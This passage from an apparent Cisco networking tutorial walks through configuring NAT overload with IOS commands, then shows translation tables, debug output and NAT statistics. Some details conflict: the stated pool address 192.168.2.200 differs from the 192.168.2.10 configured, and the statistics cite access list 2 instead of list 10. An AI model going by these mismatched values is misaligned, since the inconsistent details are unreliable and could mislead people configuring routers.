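The clash case is the one the simple table glosses over: the second host still gets translated, but to a different global port, and the router must remember that mapping or it cannot deliver the reply. Entries in a real router also expire, which is what the "Expired translations" counter in the statistics output below is counting.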


Configuration

To configure NAT Overload so that all my internal hosts on the subnet 192.168.2.0 (defined in the access list in step 3) use the address 192.168.2.200 (as defined in the NAT pool in step 2), I do the following.


1. Name the interfaces.

Secure#conf t
Secure(config)#interface eth 0
Secure(config-if)#ip nat inside
Secure(config)#interface eth 1
Secure(config-if)#ip nat outside
Secure(config-if)#exit



2. Create the pool of addresses to be used for NAT.

Secure(config)#ip nat pool Secure-Pool 192.168.2.10 192.168.2.10 net 255.255.255.0



3. Create a standard ACL that identifies the addresses that will be NAT'd.

Secure(config)#ip access-list standard 10
Secure(config-std-nacl)#permit 192.168.2.0 0.0.0.255


4. Enable NAT
Secure(config)#ip nat inside source list 10 pool Secure-Pool overload

When I ping the external host all traffic is seen as coming from the address that I set up in the pool.



All works well but because of my lab setup I need to change the pool address to one that works on my other network which connects to the internet.

Secure(config)#no ip nat inside source list 10 pool Secure-Pool overload
Secure(config)#ip nat pool Secure-Pool 10.0.1.199 10.0.1.199 net 255.255.255.0
Secure(config)#ip nat inside source list 10 pool Secure-Pool overload

Now from my lab I can get access to the web and if I ping a host on my lab net I see the correct NAT address returned.





Troubleshooting and Debugging

A useful show command for looking at active translations is:

Secure#show ip nat translations
Pro Inside global Inside local Outside local Outside global
icmp 10.0.1.199:768 192.168.2.4:768 10.0.1.5:768 10.0.1.5:768
--- 10.0.1.199 192.168.2.4 --- ---



For looking at translations as they happen you can use:

Secure#terminal monitor
Secure#debug ip nat detailed
IP NAT detailed debugging is on
Secure#
*Sep 27 14:09:52.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56303]
*Sep 27 14:09:52.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56303]
*Sep 27 14:09:52.903: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56303]
*Sep 27 14:09:52.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [32653]
*Sep 27 14:09:52.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [32653]
Secure#
*Sep 27 14:09:53.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56304]
*Sep 27 14:09:53.903: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56304]
*Sep 27 14:09:53.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [61886]
*Sep 27 14:09:53.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [61886]
Secure#
*Sep 27 14:09:54.907: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56305]
*Sep 27 14:09:54.907: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56305]
*Sep 27 14:09:54.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [47007]
*Sep 27 14:09:54.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [47007]
Secure#
*Sep 27 14:09:55.907: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56306]
*Sep 27 14:09:55.907: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56306]
*Sep 27 14:09:55.915: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [28657]
*Sep 27 14:09:55.915: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [28657]
Secure#

In the output above we can see that we're looking at ICMP traffic from 192.168.2.4 to 10.0.1.5, which is NAT'd to 10.0.1.199.


For NAT statistics:

Secure#sh ip nat statistics
Total active translations: 2 (0 static, 2 dynamic; 1 extended)
Outside interfaces:
Ethernet1
Inside interfaces:
Ethernet0
Hits: 4295 Misses: 212
CEF Translated packets: 3413, CEF Punted packets: 1847
Expired translations: 637
Dynamic mappings:
-- Inside Source
[Id: 7] access-list 2 pool Secure-Pool refcount 2
pool Secure-Pool: netmask 255.255.255.0
start 10.0.1.199 end 10.0.1.199
type generic, total addresses 1, allocated 1 (100%), misses 0
Queued Packets: 0
Secure#